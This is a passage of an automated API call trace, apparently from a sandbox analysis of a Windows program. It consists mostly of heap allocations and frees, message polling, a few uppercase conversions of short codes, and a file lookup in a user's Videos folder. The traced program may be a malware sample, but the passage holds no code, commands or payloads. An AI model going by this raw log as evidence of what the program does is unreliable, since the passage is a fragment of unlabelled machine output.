out: hHeap=0x2af0000) returned 1 [0212.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0212.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0212.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafd8 [0212.277] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77df0 [0212.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0212.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72258 [0212.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0212.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e18 [0212.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab128 [0212.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de40 [0212.278] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0212.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0212.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0212.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0212.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72228 [0212.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0212.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0212.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72398 [0212.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0212.278] CharUpperBuffW (in: lpsz="SSA2100602512", cchLength=0xd | out: lpsz="SSA2100602512") returned 0xd [0212.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0212.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0212.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae40 | out: hHeap=0x2af0000) returned 1 [0212.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0212.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0212.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0212.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0212.278] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0212.278] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.278] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0212.278] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0212.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72358 [0212.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab110 | out: hHeap=0x2af0000) returned 1 [0212.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0212.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0212.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab110 [0212.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721f8 [0212.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0212.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0212.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0212.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab098 | out: hHeap=0x2af0000) returned 1 [0212.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0212.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab098 [0212.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae40 [0212.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0212.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0212.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0212.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0212.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b70 [0212.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0212.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72378 [0212.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0212.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77eb8 [0212.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0212.279] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae88 [0212.279] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0212.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0212.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0212.280] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.280] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0212.280] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722d8 [0212.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0212.280] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0212.280] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0212.280] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab278 [0212.280] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72398 [0212.280] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0212.280] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2a8 [0212.280] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72358 [0212.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2a8 | out: hHeap=0x2af0000) returned 1 [0212.280] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b98 [0212.280] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab248 [0212.280] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab320 [0212.280] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0212.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0212.280] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae58 [0212.280] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0212.280] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0212.280] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0212.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0212.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0212.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0212.280] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae58 | out: hHeap=0x2af0000) returned 1 [0212.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0212.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab278 | out: hHeap=0x2af0000) returned 1 [0212.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0212.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab320 | out: hHeap=0x2af0000) returned 1 [0212.281] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2a8 [0212.281] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0212.281] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72398 [0212.281] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0212.281] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab380 [0212.281] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721a8 [0212.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab380 | out: hHeap=0x2af0000) returned 1 [0212.281] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0212.281] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2d8 [0212.281] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab278 [0212.281] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0212.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2a8 | out: hHeap=0x2af0000) returned 1 [0212.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0212.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0212.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0212.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab278 | out: hHeap=0x2af0000) returned 1 [0212.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0212.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0212.281] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.281] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab290 [0212.281] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72208 [0212.281] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab290 | out: hHeap=0x2af0000) returned 1 [0212.281] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0212.281] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2f0 [0212.282] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab170 [0212.282] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72398 [0212.282] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0212.282] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab188 [0212.282] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0212.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab188 | out: hHeap=0x2af0000) returned 1 [0212.282] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0212.282] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0212.282] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab368 [0212.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0212.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0212.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2f0 | out: hHeap=0x2af0000) returned 1 [0212.282] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.282] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0212.282] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72248 [0212.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0212.282] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0212.282] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab188 [0212.282] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab3b0 [0212.282] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72268 [0212.282] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0212.282] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab320 [0212.282] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722d8 [0212.282] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab320 | out: hHeap=0x2af0000) returned 1 [0212.282] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0212.282] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0212.283] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab398 [0212.283] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72208 [0212.283] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab188 | out: hHeap=0x2af0000) returned 1 [0212.283] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1a0 [0212.283] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1b8 [0212.283] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0212.283] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab380 [0212.283] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0212.283] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Videos/CBK9.flv", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27878a60, ftCreationTime.dwHighDateTime=0x1d5cb64, ftLastAccessTime.dwLowDateTime=0x97abe6e0, ftLastAccessTime.dwHighDateTime=0x1d5d2fa, ftLastWriteTime.dwLowDateTime=0x97abe6e0, ftLastWriteTime.dwHighDateTime=0x1d5d2fa, nFileSizeHigh=0x0, nFileSizeLow=0x4673, dwReserved0=0x0, dwReserved1=0x0, cFileName="CBK9.flv", cAlternateFileName="")) returned 0x9e2078 [0212.283] FindClose (in: hFindFile=0x9e2078 | out: hFindFile=0x9e2078) returned 1 [0212.283] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab380 | out: hHeap=0x2af0000) returned 1 [0212.283] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1b8 | out: hHeap=0x2af0000) returned 1 [0212.283] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1a0 | out: hHeap=0x2af0000) returned 1 [0212.283] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0212.283] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab3b0 | out: hHeap=0x2af0000) returned 1 [0212.284] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0212.284] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab398 | out: hHeap=0x2af0000) returned 1 [0212.284] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0212.284] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0212.284] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.284] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab380 [0212.284] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0212.284] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab380 | out: hHeap=0x2af0000) returned 1 [0212.284] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c10 [0212.284] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab320 [0212.284] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab2c0 [0212.284] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72208 [0212.284] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77c60 [0212.284] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab380 [0212.284] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0212.284] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab380 | out: hHeap=0x2af0000) returned 1 [0212.284] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f08 [0212.284] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab260 [0212.284] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab188 [0212.284] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72248 [0212.284] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab320 | out: hHeap=0x2af0000) returned 1 [0212.284] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab1e8 [0212.284] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab278 [0212.284] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722a8 [0212.284] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0212.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2f0 | out: hHeap=0x2af0000) returned 1 [0212.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab278 | out: hHeap=0x2af0000) returned 1 [0212.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1e8 | out: hHeap=0x2af0000) returned 1 [0212.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0212.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2c0 | out: hHeap=0x2af0000) returned 1 [0212.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0212.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab188 | out: hHeap=0x2af0000) returned 1 [0212.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c10 | out: hHeap=0x2af0000) returned 1 [0212.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0212.285] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0212.285] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0212.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0212.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0212.285] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0212.285] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0212.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77e40 | out: hHeap=0x2af0000) returned 1 [0212.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0212.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2a8 | out: hHeap=0x2af0000) returned 1 [0212.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab290 | out: hHeap=0x2af0000) returned 1 [0212.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2f0 | out: hHeap=0x2af0000) returned 1 [0212.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0212.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0212.285] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e940 | out: hHeap=0x2af0000) returned 1 [0212.285] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0212.285] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0212.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f30 | out: hHeap=0x2af0000) returned 1 [0212.285] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0212.286] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0212.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0212.286] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0212.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cd8 | out: hHeap=0x2af0000) returned 1 [0212.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722a8 | out: hHeap=0x2af0000) returned 1 [0212.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab428 | out: hHeap=0x2af0000) returned 1 [0212.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab1e8 | out: hHeap=0x2af0000) returned 1 [0212.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab2f0 | out: hHeap=0x2af0000) returned 1 [0212.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72208 | out: hHeap=0x2af0000) returned 1 [0212.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0212.286] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0212.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e640 | out: hHeap=0x2af0000) returned 1 [0212.286] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0212.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0212.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab278 | out: hHeap=0x2af0000) returned 1 [0212.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab380 | out: hHeap=0x2af0000) returned 1 [0212.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab428 | out: hHeap=0x2af0000) returned 1 [0212.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0212.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0212.286] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 